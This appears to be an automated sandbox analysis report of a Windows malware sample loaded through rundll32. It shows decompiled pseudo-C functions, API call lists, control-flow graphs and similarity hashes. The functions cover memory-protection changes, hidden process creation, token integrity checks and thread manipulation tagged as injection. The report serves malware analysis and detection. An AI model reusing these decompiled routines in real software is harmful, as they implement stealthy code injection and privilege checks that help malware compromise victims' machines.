                                          control_flow_graph 399 b67df1-b67e1f call b737a8 call b577c7 404 b67f54-b67f5b 399->404 405 b67e25-b67e36 call b5a0f2 399->405 406 b67f74-b67f80 call b737e3 404->406 410 b67f4c-b67f71 GetLastError 405->410 411 b67e3c-b67e65 call b650c5 405->411 410->406 411->406 416 b67e6b-b67e72 411->416 417 b67e74-b67e7b 416->417 418 b67ecf-b67ef8 VirtualProtect 416->418 417->418 419 b67e7d-b67e8c call b659d1 417->419 420 b67f03-b67f3d RtlEnterCriticalSection RtlLeaveCriticalSection call b65d9d 418->420 421 b67efa-b67efe call b6a8c8 418->421 419->418 428 b67e8e-b67e9c call b5a0f2 419->428 425 b67f42-b67f44 420->425 421->420 425->406 427 b67f46-b67f4a 425->427 427->406 428->418 431 b67e9e-b67eb6 428->431 432 b67ebf-b67ec9 VirtualProtect 431->432 433 b67eb8 431->433 432->418 433->432
                                          APIs
                                            • Part of subcall function 00B5A0F2: VirtualProtect.KERNEL32(00000000,00000000,00000040,00B51765,?,?,00000000,?,00000000,?,?,00B51765,00000000,00000000), ref: 00B5A117
                                            • Part of subcall function 00B5A0F2: GetLastError.KERNEL32(?,00000000,?,00000000,?,?,00B51765,00000000,00000000), ref: 00B5A11F
                                            • Part of subcall function 00B5A0F2: VirtualQuery.KERNEL32(00000000,?,0000001C,?,00000000,?,00000000,?,?,00B51765,00000000,00000000), ref: 00B5A136
                                            • Part of subcall function 00B5A0F2: VirtualProtect.KERNEL32(00000000,00000000,-2C9B417C,00B51765,?,00000000,?,00000000,?,?,00B51765,00000000,00000000), ref: 00B5A15B
                                          • GetLastError.KERNEL32(00000000,00000004,?,00000000,?,00000000,?,00B750A8,0000001C,00B6E844,00000002,00000000,00000001,?,?,?), ref: 00B67F4C
                                            • Part of subcall function 00B650C5: lstrlen.KERNEL32(?,?,?,?,00B51765), ref: 00B650FD
                                            • Part of subcall function 00B650C5: lstrcpy.KERNEL32(00000000,?), ref: 00B65114
                                            • Part of subcall function 00B650C5: StrChrA.SHLWAPI(00000000,0000002E,?,?,00B51765), ref: 00B6511D
                                            • Part of subcall function 00B650C5: GetModuleHandleA.KERNEL32(00000000,?,?,00B51765), ref: 00B6513B
                                          • VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,00000000,00000005,00000000,00000000,?,00000000,00B51765,00000000,00000004,?,00000000,?), ref: 00B67EC9
                                          • VirtualProtect.KERNEL32(?,00000004,?,?,00000000,00B51765,00000000,00000004,?,00000000,?,00000000,?,00B750A8,0000001C,00B6E844), ref: 00B67EE4
                                          • RtlEnterCriticalSection.NTDLL(00B79420), ref: 00B67F09
                                          • RtlLeaveCriticalSection.NTDLL(00B79420), ref: 00B67F27
                                            • Part of subcall function 00B5A0F2: SetLastError.KERNEL32(?,?,00000000,?,00000000,?,?,00B51765,00000000,00000000), ref: 00B5A164
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Virtual$Protect$ErrorLast$CriticalSection$EnterHandleLeaveModuleQuerylstrcpylstrlen
                                          • String ID:
                                          • API String ID: 899430048-3916222277
                                          • Opcode ID: 9d4f29bac60dc186a6b0de50e5b182ae43754e51370ac955d50a0f9ba5d986a8
                                          • Instruction ID: bdf1d791a6ebf01c49e9b3a15c77dd872ab4b700c965929d58c56bcd22e0a760
                                          • Opcode Fuzzy Hash: 9d4f29bac60dc186a6b0de50e5b182ae43754e51370ac955d50a0f9ba5d986a8
                                          • Instruction Fuzzy Hash: E6417C71840609EFDB10DF64D849AADBBF4FF08314F108299F929A7250CB38EA54CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B63D88 Relevance: 10.6, APIs: 7, Instructions: 110memorystringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 468 b63d88-b63dc7 call b644a5 VirtualAlloc 471 b63dcd-b63dd8 call b644a5 468->471 472 b63e98 468->472 477 b63ddd-b63de3 471->477 474 b63ea0-b63ea2 472->474 475 b63ea4-b63eac VirtualFree 474->475 476 b63eb2-b63ebd 474->476 475->476 478 b63de5-b63de9 477->478 479 b63e0b-b63e0d 477->479 478->479 480 b63deb-b63e09 VirtualFree VirtualAlloc 478->480 479->472 481 b63e13-b63e17 479->481 480->471 480->479 481->472 482 b63e19-b63e24 481->482 482->474 483 b63e26 482->483 484 b63e2c-b63e39 483->484 485 b63e75-b63e8f 484->485 486 b63e3b-b63e44 lstrcmpi 484->486 485->474 488 b63e91-b63e96 485->488 486->485 487 b63e46-b63e51 StrChrA 486->487 489 b63e53-b63e5f lstrcmpi 487->489 490 b63e61-b63e71 487->490 488->474 489->485 489->490 490->484 491 b63e73 490->491 491->474
                                          APIs
                                            • Part of subcall function 00B644A5: GetProcAddress.KERNEL32(?,00000318), ref: 00B644CA
                                            • Part of subcall function 00B644A5: NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 00B644E6
                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00B63DC1
                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00B63EAC
                                            • Part of subcall function 00B644A5: StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000100,00000200), ref: 00B64650
                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 00B63DF7
                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00B63E03
                                          • lstrcmpi.KERNEL32(?,00000000), ref: 00B63E40
                                          • StrChrA.SHLWAPI(?,0000002E), ref: 00B63E49
                                          • lstrcmpi.KERNEL32(?,00000000), ref: 00B63E5B
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Virtual$AllocFreelstrcmpi$AddressInformationProcProcess64QueryWow64
                                          • String ID:
                                          • API String ID: 3901270786-0
                                          • Opcode ID: fcd79b7275bb368b10049305e50da8626345e0895d62ad53f04dcd591301691f
                                          • Instruction ID: 04c04d22f1076b2b36a06e1e812dd5fb4461d97c424acbba2f8d28585638ffc0
                                          • Opcode Fuzzy Hash: fcd79b7275bb368b10049305e50da8626345e0895d62ad53f04dcd591301691f
                                          • Instruction Fuzzy Hash: C3317E71504311ABD3218F11CC44B1BBBE8FF88B55F110959F98867290DB39EE44CBB6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04892384 Relevance: 10.6, APIs: 7, Instructions: 109librarymemoryloaderCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 73%
                                          			E04892384(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E048974E0(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16); // executed
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E0489799E( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x489a300 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x489a348; // 0x9ad5a8
					_t18 = _t47 + 0x489b3e6; // 0x73797325
					_t68 = E048950E8(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x489a348; // 0x9ad5a8
						_t19 = _t50 + 0x489b747; // 0x5248cef
						_t20 = _t50 + 0x489b0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E048937E9();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0); // executed
							_push(1);
							E048937E9();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								FindCloseChangeNotification(_v28); // executed
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x489a2d8, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E04894C73(_t70);
				goto L12;
			}


















                                          0x0489238c
                                          0x0489238c
                                          0x0489239b
                                          0x048923a2
                                          0x048923a7
                                          0x048924b4
                                          0x048924bb
                                          0x048924bb
                                          0x048923b6
                                          0x048923be
                                          0x048923c1
                                          0x048923c6
                                          0x048923db
                                          0x048923e1
                                          0x048923e2
                                          0x048923e5
                                          0x048923eb
                                          0x048923ee
                                          0x048923f3
                                          0x048923fb
                                          0x04892407
                                          0x0489240b
                                          0x0489249b
                                          0x04892411
                                          0x04892411
                                          0x04892416
                                          0x0489241d
                                          0x04892431
                                          0x04892435
                                          0x04892484
                                          0x04892437
                                          0x04892438
                                          0x0489243f
                                          0x04892458
                                          0x0489245a
                                          0x0489245e
                                          0x04892465
                                          0x0489247f
                                          0x04892467
                                          0x04892470
                                          0x04892475
                                          0x04892475
                                          0x04892465
                                          0x04892493
                                          0x04892493
                                          0x0489240b
                                          0x048924a2
                                          0x048924ab
                                          0x048924af
                                          0x00000000

                                          APIs
                                            • Part of subcall function 048974E0: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,048923A0,?,?,?,?,00000000,00000000), ref: 04897505
                                            • Part of subcall function 048974E0: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04897527
                                            • Part of subcall function 048974E0: GetProcAddress.KERNEL32(00000000,614D775A), ref: 0489753D
                                            • Part of subcall function 048974E0: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04897553
                                            • Part of subcall function 048974E0: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04897569
                                            • Part of subcall function 048974E0: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 0489757F
                                          • memset.NTDLL ref: 048923EE
                                            • Part of subcall function 048950E8: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,04892407,73797325), ref: 048950F9
                                            • Part of subcall function 048950E8: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04895113
                                          • GetModuleHandleA.KERNEL32(4E52454B,05248CEF,73797325), ref: 04892424
                                          • GetProcAddress.KERNEL32(00000000), ref: 0489242B
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04892493
                                            • Part of subcall function 048937E9: GetProcAddress.KERNEL32(36776F57,04893ECD), ref: 04893804
                                          • FindCloseChangeNotification.KERNEL32(00000000,00000001), ref: 04892470
                                          • CloseHandle.KERNEL32(?), ref: 04892475
                                          • GetLastError.KERNEL32(00000001), ref: 04892479
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ChangeErrorFindFreeHeapLastNotificationmemset
                                          • String ID:
                                          • API String ID: 186216982-0
                                          • Opcode ID: 10ee7293f1b99329a614284096f75eb50e5f3acdb653b96ab8e9df53d05bada3
                                          • Instruction ID: 9c1d013ce8f5a087540c3cb4d66c66affca761cd794b839f4a98e99461726d03
                                          • Opcode Fuzzy Hash: 10ee7293f1b99329a614284096f75eb50e5f3acdb653b96ab8e9df53d05bada3
                                          • Instruction Fuzzy Hash: C8312EB2900A08BFDF10EFA8D888D9EBBFCEB08358F184E69E505E3111D775AD459B51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B68F9E Relevance: 10.6, APIs: 7, Instructions: 84sleepthreadCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B6CC5D: memset.NTDLL ref: 00B6CC67
                                          • OpenEventA.KERNEL32(00000002,00000000,00B79314,?,00000000,00000000,?,00B66085,?,?,?,?,?,?,?,00B5BF69), ref: 00B69038
                                          • SetEvent.KERNEL32(00000000,?,00B66085,?,?,?,?,?,?,?,00B5BF69,?,?,?,?,?), ref: 00B69045
                                          • Sleep.KERNEL32(00000BB8,?,00B66085,?,?,?,?,?,?,?,00B5BF69,?,?,?,?,?), ref: 00B69050
                                          • ResetEvent.KERNEL32(00000000,?,00B66085,?,?,?,?,?,?,?,00B5BF69,?,?,?,?,?), ref: 00B69057
                                          • CloseHandle.KERNEL32(00000000,?,00B66085,?,?,?,?,?,?,?,00B5BF69,?,?,?,?,?), ref: 00B6905E
                                          • GetShellWindow.USER32 ref: 00B69069
                                          • GetWindowThreadProcessId.USER32(00000000), ref: 00B69070
                                            • Part of subcall function 00B550FB: RegCloseKey.ADVAPI32(?,?,?), ref: 00B5517E
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Event$CloseWindow$HandleOpenProcessResetShellSleepThreadmemset
                                          • String ID:
                                          • API String ID: 53838381-0
                                          • Opcode ID: e58ce78b34fb20fb26e9eb9f69f783029707ff8474a41e1b38875a4fba23090d
                                          • Instruction ID: 0eea9153bca712900ecd9b5ccbfb9beb66b7805f5ee39f61564abcf021cb4293
                                          • Opcode Fuzzy Hash: e58ce78b34fb20fb26e9eb9f69f783029707ff8474a41e1b38875a4fba23090d
                                          • Instruction Fuzzy Hash: ED21D732200610BBC62167A6AC4DE6B7BEDEFC9711F118049F61E931A1DF399C81CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04897628 Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04897628(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x489a2fc > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E04894DF6(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E04894C73(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                          0x04897635
                                          0x0489763c
                                          0x04897643
                                          0x04897657
                                          0x04897662
                                          0x0489767a
                                          0x04897687
                                          0x0489768a
                                          0x0489768f
                                          0x0489769a
                                          0x0489769e
                                          0x048976ad
                                          0x048976b1
                                          0x048976cd
                                          0x048976cd
                                          0x048976d1
                                          0x048976d1
                                          0x048976d6
                                          0x048976da
                                          0x048976e0
                                          0x048976e1
                                          0x048976e8
                                          0x048976ee

                                          APIs
                                          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 0489765A
                                          • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 0489767A
                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 0489768A
                                          • CloseHandle.KERNEL32(00000000), ref: 048976DA
                                            • Part of subcall function 04894DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04895522), ref: 04894E02
                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 048976AD
                                          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 048976B5
                                          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 048976C5
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                          • String ID:
                                          • API String ID: 1295030180-0
                                          • Opcode ID: 2e01ec1f5eedfe6bf50715ecd7a525f0d2bfb3e9f79a7e20c675fa42d3383ea5
                                          • Instruction ID: 706edd5288d87864aa51ba73e64dea65c4eb7e90c3ccb28d36416256bb2f10fa
                                          • Opcode Fuzzy Hash: 2e01ec1f5eedfe6bf50715ecd7a525f0d2bfb3e9f79a7e20c675fa42d3383ea5
                                          • Instruction Fuzzy Hash: 03215975900649FFEF01AF94CC84EEEBBB9EB48304F1405A5E910E6260CB755E54EF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04893739 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 64%
                                          			E04893739(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x489a348; // 0x9ad5a8
				_t1 = _t9 + 0x489b62c; // 0x253d7325
				_t36 = 0;
				_t28 = E0489403D(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t40 = E04894DF6(_v8 +  *_t39(_a4) + 1);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t19 = E0489723B(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E04894C73(_t40);
						_t42 = E048920D2(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E04894C73(_t36);
							_t36 = _t42;
						}
						_t43 = E048972E7(_t36, _t33);
						if(_t43 != 0) {
							E04894C73(_t36);
							_t36 = _t43;
						}
					}
					E04894C73(_t28);
				}
				return _t36;
			}
















                                          0x04893739
                                          0x0489373c
                                          0x0489373d
                                          0x04893744
                                          0x0489374b
                                          0x04893752
                                          0x04893756
                                          0x0489375d
                                          0x04893764
                                          0x04893769
                                          0x0489377b
                                          0x0489377f
                                          0x04893783
                                          0x04893789
                                          0x0489378e
                                          0x04893798
                                          0x0489379e
                                          0x048937a0
                                          0x048937b7
                                          0x048937bb
                                          0x048937be
                                          0x048937c3
                                          0x048937c3
                                          0x048937cc
                                          0x048937d0
                                          0x048937d3
                                          0x048937d8
                                          0x048937d8
                                          0x048937d0
                                          0x048937db
                                          0x048937e0
                                          0x048937e6

                                          APIs
                                            • Part of subcall function 0489403D: lstrlen.KERNEL32(00000000,00000000,00000000,7477C740,?,?,?,04893752,253D7325,00000000,7477C740,?,?,0489653D,?,052495B0), ref: 048940A4
                                            • Part of subcall function 0489403D: sprintf.NTDLL ref: 048940C5
                                          • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,7477C740,?,?,0489653D,?,052495B0), ref: 04893764
                                          • lstrlen.KERNEL32(?,?,?,0489653D,?,052495B0), ref: 0489376C
                                            • Part of subcall function 04894DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04895522), ref: 04894E02
                                          • strcpy.NTDLL ref: 04893783
                                          • lstrcat.KERNEL32(00000000,?), ref: 0489378E
                                            • Part of subcall function 0489723B: lstrlen.KERNEL32(?,?,?,00000000,?,0489379D,00000000,?,?,?,0489653D,?,052495B0), ref: 0489724C
                                            • Part of subcall function 04894C73: RtlFreeHeap.NTDLL(00000000,00000000,048955C4,00000000,?,?,00000000), ref: 04894C7F
                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,0489653D,?,052495B0), ref: 048937AB
                                            • Part of subcall function 048920D2: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,048937B7,00000000,?,?,0489653D,?,052495B0), ref: 048920DC
                                            • Part of subcall function 048920D2: _snprintf.NTDLL ref: 0489213A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                          • String ID: =
                                          • API String ID: 2864389247-1428090586
                                          • Opcode ID: 8af1b900f7b55b215bb0a9b94aaf0024eb76312e658f4f0aca1fbdc8b3e65e25
                                          • Instruction ID: 8518470b3e4b9f7b0886734ee1bef3f0fda9c83ff6225a52bf1f6718cd097c0c
                                          • Opcode Fuzzy Hash: 8af1b900f7b55b215bb0a9b94aaf0024eb76312e658f4f0aca1fbdc8b3e65e25
                                          • Instruction Fuzzy Hash: B211E773905D247B5F127BBC9C84CAE36DC9E88A5831D0B15F905D7200DFB4ED0287A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04893C00 Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 04891162: IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,052489D8,04893C2E,?,?,?,?,?,?,?,?,?,?,?,04893C2E), ref: 0489122F
                                            • Part of subcall function 04896615: IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 04896652
                                            • Part of subcall function 04896615: IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 04896683
                                          • SysAllocString.OLEAUT32(00000000), ref: 04893C5A
                                          • SysAllocString.OLEAUT32(0070006F), ref: 04893C6E
                                          • SysAllocString.OLEAUT32(00000000), ref: 04893C80
                                          • SysFreeString.OLEAUT32(00000000), ref: 04893CE8
                                          • SysFreeString.OLEAUT32(00000000), ref: 04893CF7
                                          • SysFreeString.OLEAUT32(00000000), ref: 04893D02
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
                                          • String ID:
                                          • API String ID: 2831207796-0
                                          • Opcode ID: 6ae70014a010be8343d2591d267cd67db5674698306ace83251e85f9ac204cd9
                                          • Instruction ID: c75e8510fdcf5f39f50e12cebb103d05f19c669b5c2b01fa3906dbe62bd24d1f
                                          • Opcode Fuzzy Hash: 6ae70014a010be8343d2591d267cd67db5674698306ace83251e85f9ac204cd9
                                          • Instruction Fuzzy Hash: 5A414F36900A09AFDF01EFBCD844AAEB7BAEF49304F184925ED10EB210DA71AD05CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5F6D8 Relevance: 9.1, APIs: 6, Instructions: 125threadsynchronizationinjectionCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.NTDLL ref: 00B5F6FB
                                            • Part of subcall function 00B54345: GetModuleHandleA.KERNEL32(?,?,69B25F44,69B25F44,?,00B65886,00000000,00000000,69B25F44,00000000,?,?,00B5335A,?,00000000,?), ref: 00B54366
                                            • Part of subcall function 00B54345: GetProcAddress.KERNEL32(00000000,?), ref: 00B5437F
                                            • Part of subcall function 00B54345: OpenProcess.KERNEL32(00000400,00000000,69B25F44,?,69B25F44,69B25F44,?,00B65886,00000000,00000000,69B25F44,00000000,?,?,00B5335A,?), ref: 00B5439C
                                            • Part of subcall function 00B54345: IsWow64Process.KERNEL32(?,00000000,?,69B25F44,69B25F44,?,00B65886,00000000,00000000,69B25F44,00000000,?,?,00B5335A,?,00000000), ref: 00B543AD
                                            • Part of subcall function 00B54345: FindCloseChangeNotification.KERNEL32(?,?,00B65886,00000000,00000000,69B25F44,00000000,?,?,00B5335A,?,00000000,?), ref: 00B543C0
                                          • ResumeThread.KERNEL32(?,?,00000000,CCCCFEEB,?,00000000,00000000,00000004,?,00000000,00000000,76D84EE0,00000000), ref: 00B5F7B5
                                          • WaitForSingleObject.KERNEL32(00000064), ref: 00B5F7C3
                                          • SuspendThread.KERNEL32(?), ref: 00B5F7D6
                                            • Part of subcall function 00B5CF88: memset.NTDLL ref: 00B5D252
                                          • ResumeThread.KERNEL32(?), ref: 00B5F859
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Thread$ProcessResumememset$AddressChangeCloseFindHandleModuleNotificationObjectOpenProcSingleSuspendWaitWow64
                                          • String ID:
                                          • API String ID: 2397206891-0
                                          • Opcode ID: e2701b4228f73181b4d687d0641655a61036192d77afb416e0cace8610da1456
                                          • Instruction ID: f6e042c51dcd768b9efe58927695564e4fa06f76f5c39e9f1fe2eef5797bbc05
                                          • Opcode Fuzzy Hash: e2701b4228f73181b4d687d0641655a61036192d77afb416e0cace8610da1456
                                          • Instruction Fuzzy Hash: 6A418B7290020AEBDB21AF64CC85BAEBBEAEB04306F1444F5FD15A7150DB34DE998B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6FAF2 Relevance: 9.1, APIs: 6, Instructions: 109memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32(00000000,?,?,?,00000000,00B750B8,00000018,00B5309A,00000000,?,?,?,?,00000000), ref: 00B6FB35
                                          • VirtualProtect.KERNEL32(00000000,00000004,00000000,00000000,00000000,00000004,00000000,?,00000000,?,?,?,00000000,00B750B8,00000018,00B5309A), ref: 00B6FBC0
                                          • RtlEnterCriticalSection.NTDLL(00B79420), ref: 00B6FBE9
                                          • RtlLeaveCriticalSection.NTDLL(00B79420), ref: 00B6FC07
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
                                          • String ID:
                                          • API String ID: 3666628472-0
                                          • Opcode ID: 5d5167ac54b73a141b235a1be04a860275826662836e0138ef4f0ecae639a0f0
                                          • Instruction ID: ffe3811a98b6a28c8c918b0715dc4e8cb49cabc9080519fb68f327378fa0911d
                                          • Opcode Fuzzy Hash: 5d5167ac54b73a141b235a1be04a860275826662836e0138ef4f0ecae639a0f0
                                          • Instruction Fuzzy Hash: F8417DB190070AEFCB11DF65D885AADBBF5FF48300B1085A9E919E7220D7749A91CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

